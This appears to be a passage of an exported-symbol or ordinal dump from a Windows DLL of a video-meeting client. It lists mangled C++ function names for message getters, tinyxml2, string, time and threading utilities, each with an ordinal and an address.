              ?Get_smapleRate@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEAAIXZ38130x418bd0
              ?Get_source@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEAAIXZ38140x418bd0
              ?Get_source@CSBMBMessage_InviteeIakRequest@@QAEAAHXZ38150x417570
              ?Get_source@CSBMBMessage_RequestUpdateAICAdminSetting@@QAEAAHXZ38160x418390
              ?Get_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEAAIXZ38170x4190a0
              ?Get_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEAAIXZ38180x418600
              ?Get_sourceType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEAAIXZ38190x418730
              ?Get_sourceType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEAAIXZ38200x4190a0
              ?Get_speakerID@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEAAIXZ38210x417570
              ?Get_star@CSBMBMessage_VCardSetBuddyStar@@QAEAAHXZ38220x417570
              ?Get_start@CSBMBMessage_Assistant_Voice_Command_Start_Request@@QAEAAHXZ38230x40c930
              ?Get_status@CSBMBMessage_Assistant_DAL_Service_Get_Service_Status_Response@@QAEAAIXZ38240x40c930
              ?Get_status@CSBMBMessage_Assistant_Voice_Command_Status_Notification@@QAEAAHXZ38250x417c00
              ?Get_status@CSBMBMessage_CCIVideoEndDropdownButtonClickConfirmRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38260x40c930
              ?Get_status@CSBMBMessage_NotifyConferenceStatus@@QAEAAIXZ38270x418760
              ?Get_status@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEAAHXZ38280x418390
              ?Get_status@CSBMBMessage_NotifyPTDeviceInfo@@QAEAAIXZ38290x417c00
              ?Get_status@CSBMBMessage_NotifyVideoLayoutDownloadStatus@@QAEAAHXZ38300x40c930
              ?Get_str@CSBMBMessage_MeetingDiagInfo@@QAEAAV?$CStringT@D@Cmm@@XZ38310x40c930
              ?Get_strCallId@CSBMBMessage_StartCallOutInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ38320x419b50
              ?Get_strCommand@CSBMBMessage_CCIVideoReceiveCommandNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38330x40c930
              ?Get_strCommand@CSBMBMessage_CCIVideoSendCommandRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38340x417570
              ?Get_strCustomerId@CSBMBMessage_CCIVideoChangeHostRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38350x40c930
              ?Get_strCustomerId@CSBMBMessage_CCIVideoSendCommandRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38360x40c930
              ?Get_strData@CSBMBMessage_CCIVideoUserDataUpdateNotify@@QAEAAV?$CStringT@D@Cmm@@XZ38370x40c930
              ?Get_strDefaultProfile@CSBMBMessage_OutlookOnGetDefaultProfileNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38380x40c930
              ?Get_strEngagementId@CSBMBMessage_CCIScreenRecordingRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38390x418bd0
              ?Get_strJsCallId@CSBMBMessage_CCIScreenRecordingNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38400x417c00
              ?Get_strJsCallId@CSBMBMessage_CCIScreenRecordingRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38410x418390
              ?Get_strJson@CSBMBMessage_CCIVideoJoinMeetingRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38420x40c930
              ?Get_strJsonEvents@CSBMBMessage_OutlookGetMAPICalendarEvents@@QAEAAV?$CStringT@D@Cmm@@XZ38430x40c930
              ?Get_strMsg@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEAAV?$CStringT@_W@Cmm@@XZ38440x40c930
              ?Get_strResult@CSBMBMessage_CCIVideoWarmTransferNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38450x40c930
              ?Get_strSessionId@CSBMBMessage_CCIScreenRecordingNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38460x418ba0
              ?Get_strSessionName@CSBMBMessage_CCIScreenRecordingNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38470x418390
              ?Get_strSpokenLangName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@QAEAAV?$CStringT@_W@Cmm@@XZ38480x417c00
              ?Get_strStatus@CSBMBMessage_CCIVideoHoldStatusChangeNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38490x40c930
              ?Get_strStatus@CSBMBMessage_CCIVideoWarmTransferRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38500x40c930
              ?Get_strToken@CSBMBMessage_CCIScreenRecordingRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38510x417c00
              ?Get_strTpc@CSBMBMessage_CCIScreenRecordingRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38520x418ba0
              ?Get_strTranscriptLangName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@QAEAAV?$CStringT@_W@Cmm@@XZ38530x419ac0
              ?Get_strType@CSBMBMessage_Notify_ZPNS_MeetingStart@@QAEAAV?$CStringT@_W@Cmm@@XZ38540x40c930
              ?Get_strUserId@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEAAV?$CStringT@_W@Cmm@@XZ38550x417570
              ?Get_strUserId@CSBMBMessage_CCIVideoWarmTransferRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38560x417570
              ?Get_strUserName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEAAV?$CStringT@_W@Cmm@@XZ38570x417f30
              ?Get_subConfType@CSBMBMessage_ConfirmConfLeave@@QAEAAIXZ38580x419c90
              ?Get_subHasError@CSBMBMessage_ConfirmConfLeave@@QAEAAHXZ38590x419c60
              ?Get_subSdkError@CSBMBMessage_ConfirmConfLeave@@QAEAAIXZ38600x419cc0
              ?Get_success@CSBMBMessage_CameraControlGroupFetched@@QAEAAHXZ38610x417570
              ?Get_success@CSBMBMessage_CameraControlGroupRemoved@@QAEAAHXZ38620x417570
              ?Get_success@CSBMBMessage_ComponentDownloadResult@@QAEAAHXZ38630x417c00
              ?Get_success@CSBMBMessage_PSComponentDownloadResult@@QAEAAHXZ38640x417c00
              ?Get_text@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEAAV?$CStringT@_W@Cmm@@XZ38650x418ba0
              ?Get_text@CSBMBMessage_CCIVideoSetEndButtonTextRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38660x40c930
              ?Get_threadId@CSBMBMessage_PMCOpenTeamChatReq@@QAEAAV?$CStringT@_W@Cmm@@XZ38670x418bd0
              ?Get_threadSvrTime@CSBMBMessage_PMCOpenTeamChatReq@@QAEAA_JXZ38680x422ea0
              ?Get_thumbnailUrl@CSBMBMessage_NotifyShareFileInMeetingChat@@QAEAAV?$CStringT@_W@Cmm@@XZ38690x417f50
              ?Get_thumbnail_path@CSBMBMessage_SaveCustom3DAvatarToWeb@@QAEAAV?$CStringT@_W@Cmm@@XZ38700x419af0
              ?Get_thumbnail_path@CSBMBMessage_UpdateCustom3DAvatarToWeb@@QAEAAV?$CStringT@_W@Cmm@@XZ38710x419af0
              ?Get_timeStamp@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEAA_JXZ38720x41c710
              ?Get_timeout_seconds@CSBMBMessage_MediaAPIRequest@@QAEAAIXZ38730x418390
              ?Get_title@CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAEAAV?$CStringT@D@Cmm@@XZ38740x417c00
              ?Get_title@CSBMBMessage_MeetingWallpaperStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ38750x417570
              ?Get_title@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ38760x417570
              ?Get_tmServerside@CSBMBMessage_NotifyMeetingCallResponse@@QAEAA_JXZ38770x41c710
              ?Get_to_WindowId@CSBMBMessage_CCIVideoEmbedWindowSendMsgRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38780x417570
              ?Get_to_WindowId@CSBMBMessage_CCIVideoOnEmbedWindowSendMsgRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38790x417570
              ?Get_toggle@CSBMBMessage_MeetingPAAPToggleEvent@@QAEAAHXZ38800x417570
              ?Get_token@CSBMBMessage_CompanionTokenResponse@@QAEAAV?$CStringT@D@Cmm@@XZ38810x417f50
              ?Get_token@CSBMBMessage_InviteZoomPhoneTokenResponse@@QAEAAV?$CStringT@D@Cmm@@XZ38820x417570
              ?Get_token@CSBMBMessage_PairRelationTokenResponse@@QAEAAV?$CStringT@D@Cmm@@XZ38830x418390
              ?Get_top@CSBMBMessage_PMCOpenTeamChatReq@@QAEAAHXZ38840x426270
              ?Get_trackingId@CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAEAAV?$CStringT@D@Cmm@@XZ38850x4193d0
              ?Get_txChannelCounts@CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@QAEAAHXZ38860x418bd0
              ?Get_txChannelCounts@CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAEAAHXZ38870x41f260
              ?Get_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEAAHXZ38880x418730
              ?Get_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEAAHXZ38890x4190a0
              ?Get_txChannelID@CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Request@@QAEAAHXZ38900x40c930
              ?Get_txChannelID@CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Response@@QAEAAHXZ38910x417c00
              ?Get_type@CSBMBMessage_Assistant_Voice_Command_Data_Request@@QAEAAHXZ38920x40c930
              ?Get_type@CSBMBMessage_Assistant_Voice_Command_Data_Response@@QAEAAHXZ38930x40c930
              ?Get_type@CSBMBMessage_Assistant_Voice_Command_Status_Notification@@QAEAAHXZ38940x40c930
              ?Get_type@CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAEAAHXZ38950x40c930
              ?Get_type@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEAAIXZ38960x422ea0
              ?Get_type@CSBMBMessage_CCIVideoSetEndButtonTextRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38970x417570
              ?Get_type@CSBMBMessage_NotifyCustom3DAvatarFileIdUpdated@@QAEAAHXZ38980x40c930
              ?Get_type@CSBMBMessage_NotifyMeetingCustom3DAvatarElementThumbnailDownloaded@@QAEAAHXZ38990x40c930
              ?Get_type@CSBMBMessage_NotifyMeetingFaceMakeupDownloaded@@QAEAAHXZ39000x40c930
              ?Get_type@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEAAHXZ39010x417570
              ?Get_type@CSBMBMessage_NotifyPTDeviceInfo@@QAEAAIXZ39020x40c930
              ?Get_type@CSBMBMessage_NotifyShareFileInMeetingChat@@QAEAAV?$CStringT@_W@Cmm@@XZ39030x418190
              ?Get_type@CSBMBMessage_PS_UpdateAccountInfo@@QAEAAHXZ39040x40c930
              ?Get_type@CSBMBMessage_PS_UpdateKeyValueInfo@@QAEAAHXZ39050x40c930
              ?Get_type@CSBMBMessage_RemoveCustom3DAvatarToWeb@@QAEAAHXZ39060x40c930
              ?Get_type@CSBMBMessage_SaveCustom3DAvatarToWeb@@QAEAAHXZ39070x40c930
              ?Get_type@CSBMBMessage_TrackingPAAPEvent@@QAEAAHXZ39080x417570
              ?Get_type@CSBMBMessage_UpdateCustom3DAvatarToWeb@@QAEAAHXZ39090x40c930
              ?Get_url@CSBMBMessage_CCIVideoOpenURLWithDefaultBrowser@@QAEAAV?$CStringT@D@Cmm@@XZ39100x40c930
              ?Get_url@CSBMBMessage_MeetingWallpaperStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ39110x417f30
              ?Get_url@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ39120x417f30
              ?Get_url@CSBMBMessage_NotifyMeetingImageDownloaded@@QAEAAV?$CStringT@_W@Cmm@@XZ39130x40c930
              ?Get_url@CSBMBMessage_RequestMyIDPToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39140x417f30
              ?Get_url@CSBMBMessage_ZoomInternalNavigateURLEvent@@QAEAAV?$CStringT@_W@Cmm@@XZ39150x40c930
              ?Get_userData@CSBMBMessage_NotifyMeetingImageDownloaded@@QAEAAHXZ39160x417f30
              ?Get_userDeviceID@CSBMBMessage_NotifyConfPListChanged@@QAEAAV?$CStringT@_W@Cmm@@XZ39170x418ba0
              ?Get_userEmail@CSBMBMessage_NotifyPTCleanIDPToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39180x417570
              ?Get_userEmail@CSBMBMessage_RequestMyIDPToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39190x418190
              ?Get_userFBID@CSBMBMessage_NotifyConfPListChanged@@QAEAAV?$CStringT@_W@Cmm@@XZ39200x418390
              ?Get_userFMName@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ39210x418390
              ?Get_userID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEAAHXZ39220x40c930
              ?Get_userID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEAAHXZ39230x417c00
              ?Get_userID@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEAAHXZ39240x40c930
              ?Get_userID@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEAAHXZ39250x417c00
              ?Get_userID@CSBMBMessage_NotifyPTCleanIDPToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39260x40c930
              ?Get_userID@CSBMBMessage_RequestMyIDPToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39270x418160
              ?Get_userId@CSBMBMessage_CCIVideoAssignAndNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ39280x40c930
              ?Get_userName@CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAEAAV?$CStringT@D@Cmm@@XZ39290x418760
              ?Get_userZoomID@CSBMBMessage_UserInTrustListInfo@@QAEAAV?$CStringT@D@Cmm@@XZ39300x40c930
              ?Get_user_guid@CSBMBMessage_ConfGetZRMeetingInfoReq@@QAEAAV?$CStringT@_W@Cmm@@XZ39310x40c930
              ?Get_user_input@CSBMBMessage_ConfirmRecaptcha@@QAEAAV?$CStringT@_W@Cmm@@XZ39320x40c930
              ?Get_user_zoom_id@CSBMBMessage_VCardDataRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ39330x40c930
              ?Get_user_zoom_id@CSBMBMessage_VCardFetchManagerInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ39340x40c930
              ?Get_user_zoom_id@CSBMBMessage_VCardSetBuddyStar@@QAEAAV?$CStringT@_W@Cmm@@XZ39350x40c930
              ?Get_value@CSBMBMessage_MeshNotification@@QAEAAV?$CStringT@D@Cmm@@XZ39360x417c00
              ?Get_value@CSBMBMessage_PS_UpdateKeyValueInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ39370x418390
              ?Get_value@CSBMBMessage_RequestUpdateAICAdminSetting@@QAEAAHXZ39380x417570
              ?Get_videoEvent@CSBMBMessage_CCIVideoEventReportNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ39390x40c930
              ?Get_wParam@CSBMBMessage_InviteWinStatus@@QAEAAIXZ39400x418730
              ?Get_wallpaper_id@CSBMBMessage_MeetingWallpaperStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ39410x40c930
              ?Get_wallpaper_id@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ39420x40c930
              ?Get_wallpaper_id@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEAAV?$CStringT@_W@Cmm@@XZ39430x40c930
              ?Get_webClientUrl@CSBMBMessage_LeaveConfErrorDesc@@QAEAAV?$CStringT@_W@Cmm@@XZ39440x418bd0
              ?Get_web_record_info@CSBMBMessage_PS_PSAsyncRecordingUploadResult@@QAEAAV?$CStringT@_W@Cmm@@XZ39450x418390
              ?Get_web_record_info@CSBMBMessage_PS_PTReturnAsyncRecordingActionToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39460x417c00
              ?Get_whiteboardUrlRegular@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@D@Cmm@@XZ39470x41a1a0
              ?Get_width@CSBMBMessage_PMCOpenTeamChatReq@@QAEAAHXZ39480x41a080
              ?Get_windowId@CSBMBMessage_CCIVideoCreateEmbedWindowNotify@@QAEAAV?$CStringT@D@Cmm@@XZ39490x418390
              ?Get_windowId@CSBMBMessage_CCIVideoDestroyEmbedWindowNotify@@QAEAAV?$CStringT@D@Cmm@@XZ39500x418390
              ?Get_windowId@CSBMBMessage_CCIVideoShowEmbedWindowNotify@@QAEAAV?$CStringT@D@Cmm@@XZ39510x418390
              ?Get_workflowUrlRegualr@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ39520x41a170
              ?Get_workvivoDomain@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@D@Cmm@@XZ39530x41a0e0
              ?Get_zoomDocsUrlRegular@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ39540x41a140
              ?Get_zr_userid@CSBMBMessage_NotifyConfZRMeetingInfo@@QAEAAHXZ39550x417c00
              ?GetlocalTm2@CTime@Cmm@@QBE_NAAUtm@@@Z39560x411e10
              ?HasBOM@XMLDocument@tinyxml2@@QBE_NXZ39570x4544b0
              ?HasUrgentEvent@CCmmPerfTelemetry@@SAHXZ39580x4564e0
              ?HighResNow@TimeTicks@Cmm@@SA?AV12@XZ39590x451d20
              ?Identify@XMLDocument@tinyxml2@@QAEPADPADPAPAVXMLNode@2@@Z39600x460240
              ?InDays@TimeDelta@Cmm@@QBEHXZ39610x451200
              ?InHours@TimeDelta@Cmm@@QBEHXZ39620x451220
              ?InMicroseconds@TimeDelta@Cmm@@QBE_JXZ39630x411a70
              ?InMilliseconds@TimeDelta@Cmm@@QBE_JXZ39640x4512e0
              ?InMillisecondsF@TimeDelta@Cmm@@QBENXZ39650x4512b0
              ?InMillisecondsRoundedUp@TimeDelta@Cmm@@QBE_JXZ39660x451300
              ?InMinutes@TimeDelta@Cmm@@QBEHXZ39670x451240
              ?InSeconds@TimeDelta@Cmm@@QBE_JXZ39680x451290
              ?InSecondsF@TimeDelta@Cmm@@QBENXZ39690x451260
              ?Inc@CAtomicInt@Cmm@@QAEJXZ39700x417030
              ?Init@LogMessage@logging@@AAEXPBDH@Z39710x45e4c0
              ?Initialize@CPU@Cmm@@AAEXXZ39720x45f2d0
              ?InsertAfterChild@XMLNode@tinyxml2@@QAEPAV12@PAV12@0@Z39730x460680
              ?InsertBeforeExtension@FilePath@Cmm@@QBE?AV12@ABV?$CStringT@_W@2@@Z39740x45b060
              ?InsertBeforeExtensionASCII@FilePath@Cmm@@QBE?AV12@ABVStringPiece@2@@Z39750x45b1c0
              ?InsertChildPreamble@XMLNode@tinyxml2@@ABEXPAV12@@Z39760x460a40
              ?InsertEndChild@XMLNode@tinyxml2@@QAEPAV12@PAV12@@Z39770x4605e0
              ?InsertFirstChild@XMLNode@tinyxml2@@QAEPAV12@PAV12@@Z39780x460630
              ?InsertNewChildElement@XMLElement@tinyxml2@@QAEPAV12@PBD@Z39790x461ea0
              ?InsertNewComment@XMLElement@tinyxml2@@QAEPAVXMLComment@2@PBD@Z39800x461ed0
              ?InsertNewDeclaration@XMLElement@tinyxml2@@QAEPAVXMLDeclaration@2@PBD@Z39810x461f30
              ?InsertNewText@XMLElement@tinyxml2@@QAEPAVXMLText@2@PBD@Z39820x461f00
              ?InsertNewUnknown@XMLElement@tinyxml2@@QAEPAVXMLUnknown@2@PBD@Z39830x461f60
              ?Int64Attribute@XMLElement@tinyxml2@@QBE_JPBD_J@Z39840x461510
              ?Int64Text@XMLElement@tinyxml2@@QBE_J_J@Z39850x461b70
              ?Int64ToString@Cmm@@YAH_JAAV?$CStringT@D@1@@Z39860x414000
              ?Int64ToString@Cmm@@YAH_JAAV?$CStringT@_W@1@@Z39870x414070
              ?Int64Value@XMLAttribute@tinyxml2@@QBE_JXZ39880x4545a0
              ?IntAttribute@XMLElement@tinyxml2@@QBEHPBDH@Z39890x4614b0
              ?IntText@XMLElement@tinyxml2@@QBEHH@Z39900x461b30
              ?IntToString@Cmm@@YAXHAAV?$CStringT@D@1@@Z39910x4143b0
              ?IntToString@Cmm@@YAXHAAV?$CStringT@_W@1@@Z39920x414400
              ?IntValue@XMLAttribute@tinyxml2@@QBEHXZ39930x454580
              ?IsAbsolute@FilePath@Cmm@@QBE_NXZ39940x45b600
              ?IsContainer@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ39950x454400
              ?IsEmpty@?$CStringT@D@Cmm@@QBEHXZ39960x403ae0
              ?IsEmpty@?$CStringT@_W@Cmm@@QBEHXZ39970x403ae0
              ?IsEnablePerformanceMetrics@CCmmPerfTelemetry@@SAHXZ39980x4564a0
              ?IsEnableSendMetrics@CCmmPerfTelemetry@@SAHXZ39990x4564b0
              ?IsEssential@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ40000x458830
              ?IsGood@Channel@ssb_ipc@@QAE_NXZ40010x45cb30
              ?IsHighResClockWorking@TimeTicks@Cmm@@SA_NXZ40020x451db0
              ?IsNameChar@XMLUtil@tinyxml2@@SA_NE@Z40030x4542d0
              ?IsNameStartChar@XMLUtil@tinyxml2@@SA_NE@Z40040x4542a0
              ?IsOpened@CFile@Cmm@@QAEHXZ40050x411890
              ?IsParent@FilePath@Cmm@@QBE_NABV12@@Z40060x45ac80
              ?IsParsed@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ40070x417000
              ?IsRunning@CThread@Cmm@@QAEHXZ40080x417340
              ?IsSeparator@FilePath@Cmm@@SA_N_W@Z40090x45a8a0
              ?IsServerGood@CIPCChannelThread@ssb_ipc@@QAEHXZ40100x4281b0
              ?IsSignaled@CState@Cmm@@QAEHXZ40110x4171a0
              ?IsSupportLoop@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ40120x458840
              ?IsText@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ40130x454490
              ?IsType@Value@@QBE_NW4ValueType@1@@Z40140x45dc00
              ?IsUTF8Continuation@XMLUtil@tinyxml2@@SA_ND@Z40150x454340
              ?IsValid@CThread@Cmm@@QBEHXZ40160x417250
              ?IsValid@CTime@Cmm@@QBEHXZ40170x411db0
              ?IsValid@LogFilterItem_s@logging@@QBE_NXZ40180x44ba00
              ?IsValidateUTF8@Cmm@@YA_NABV?$CStringT@D@1@@Z40190x414890
              ?IsWhiteSpace@XMLUtil@tinyxml2@@SA_ND@Z40200x454270
              ?IsWrittenComplete@CmmInternelMsg@Cmm@@QAE_NXZ40210x45bd80
              ?Join@CThread@Cmm@@QAEXXZ40220x4172e0
              ?Join@PlatformThread@@SAXPAX@Z40230x45f110
              ?Kill@CThread@Cmm@@QAEXXZ40240x417310
              ?KillTimer@CTimerID@Cmm@@QAEXXZ40250x451fd0
              ?LastChild@XMLConstHandle@tinyxml2@@QBE?BV12@XZ40260x454c00
              ?LastChild@XMLHandle@tinyxml2@@QAE?AV12@XZ40270x454c00
              ?LastChild@XMLNode@tinyxml2@@QAEPAV12@XZ40280x417010
              ?LastChild@XMLNode@tinyxml2@@QBEPBV12@XZ40290x417010
              ?LastChildElement@XMLConstHandle@tinyxml2@@QBE?BV12@PBD@Z40300x454c20
              ?LastChildElement@XMLHandle@tinyxml2@@QAE?AV12@PBD@Z40310x454c20
              ?LastChildElement@XMLNode@tinyxml2@@QAEPAVXMLElement@2@PBD@Z40320x4543d0
              ?LastChildElement@XMLNode@tinyxml2@@QBEPBVXMLElement@2@PBD@Z40330x460710
              ?LastName@CCmmArchivePath@Cmm@@QBEABV?$CStringT@_W@2@XZ40340x459c90
              ?Left@?$CStringT@D@Cmm@@QBE?AV?$CRangeT@PBD@2@I@Z40350x405470
              ?Left@?$CStringT@_W@Cmm@@QBE?AV?$CRangeT@PB_W@2@I@Z40360x4035c0
              ?LinkEndChild@XMLNode@tinyxml2@@QAEPAV12@PAV12@@Z40370x454470
              ?LoadFile@XMLDocument@tinyxml2@@QAE?AW4XMLError@2@PAU_iobuf@@@Z40380x462600
              ?LoadFile@XMLDocument@tinyxml2@@QAE?AW4XMLError@2@PBD@Z40390x462590
              ?LoadFromXml@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAVXMLElement@tinyxml2@@PAV123@@Z40400x458b60
              ?LoadStringW@?$CStringT@D@Cmm@@QAEXPAUHINSTANCE__@@I@Z40410x405150
              ?LoadStringW@?$CStringT@_W@Cmm@@QAEXPAUHINSTANCE__@@I@Z40420x4031d0
              ?LocalExplode@Time@Cmm@@QBEXPAUExploded@12@@Z40430x40e1b0
              ?LocalMidnight@Time@Cmm@@QBE?AV12@XZ40440x4514c0
              ?Lock@CCritical@Cmm@@QAEXXZ40450x40c780
              ?Lock@CEvent@Cmm@@QAE?AW4ESyncRet@@K@Z40460x40c250
              ?Lock@CEvent@Cmm@@QAEXXZ40470x417150
              ?Lock@CMutex@Cmm@@QAEXXZ40480x417110
              ?Lock@CState@Cmm@@QAE?AW4ESyncRet@@K@Z40490x40c250
              ?Lock@CState@Cmm@@QAEXXZ40500x417150
              ?MM_InitWithServerTime@Time@Cmm@@SAXABV12@@Z40510x451730
              ?MM_Now@Time@Cmm@@SA?AV12@XZ40520x4517d0
              ?MM_Svr_Now@Time@Cmm@@SA?AV12@XZ40530x451860
              ?MakeLower@?$CStringT@D@Cmm@@QAEXXZ40540x405210
              ?MakeLower@?$CStringT@_W@Cmm@@QAEXXZ40550x4032d0
              ?MakeMessage@CmmMQ_Msg@Cmm@@SAPAV12@PBEIH@Z40560x45f4f0
              ?MakeObject@CCmmArchiveService@Cmm@@SAPAVICmmArchiveObject@2@ABV?$CStringT@_W@2@H@Z40570x455e00
              ?MakeObject@CCmmArchiveServiceImp@Archive@Cmm@@QAEPAVICmmArchiveObject@3@ABV?$CStringT@_W@3@H@Z40580x4555b0
              ?MakeOutPlatformEvent@@YAXAAUPerfMetricsEvents_s@ZoomPTPAAP@@W4e_chat_perfmetrics_Perfmetrics_platform_event@@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@ABV?$CStringT@_W@Cmm@@AAV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@AAV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics40590x468af0
              ?MakeOutPlatformEvent@@YAXAAUPerfMetricsEvents_s@ZoomPTPAAP@@W4e_chat_perfmetrics_Perfmetrics_platform_event@@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@ABV?$CStringT@_W@Cmm@@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@HAAV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@AAV?$map@W4e_chat_perfmetrics_Perfmetr40600x468b70
              ?MakeReverse@?$CStringT@D@Cmm@@QAEXXZ40610x405360
              ?MakeReverse@?$CStringT@_W@Cmm@@QAEXXZ40620x403430
              ?MakeSlash@CFileName@Cmm@@QAEXXZ40630x4125e0
              ?MakeUpper@?$CStringT@D@Cmm@@QAEXXZ40640x4051f0
              ?MakeUpper@?$CStringT@_W@Cmm@@QAEXXZ40650x4032b0
              ?MarkInUse@XMLDocument@tinyxml2@@QAEXQBVXMLNode@2@@Z40660x462370
              ?Match@?$CStringT@D@Cmm@@QBEHPBDDH@Z40670x405540
              ?Match@?$CStringT@_W@Cmm@@QBEHPB_W_WH@Z40680x403690
              ?MatchWith@?$CStringT@D@Cmm@@QBE_NABV12@_N1@Z40690x4059d0
              ?MatchWith@?$CStringT@_W@Cmm@@QBE_NABV12@_N1@Z40700x403b70
              ?MatchesExtension@FilePath@Cmm@@QBE_NABV?$CStringT@_W@2@@Z40710x45b420
              ?MetricsFetchEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_fetch_event@@@Z40720x4683e0
              ?MetricsFetchHandlerEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_fetch_handler_event@@@Z40730x4684c0
              ?MetricsFileEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_file_event@@@Z40740x468960
              ?MetricsHeartBeatEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_heartbeat_event@@@Z40750x4685c0
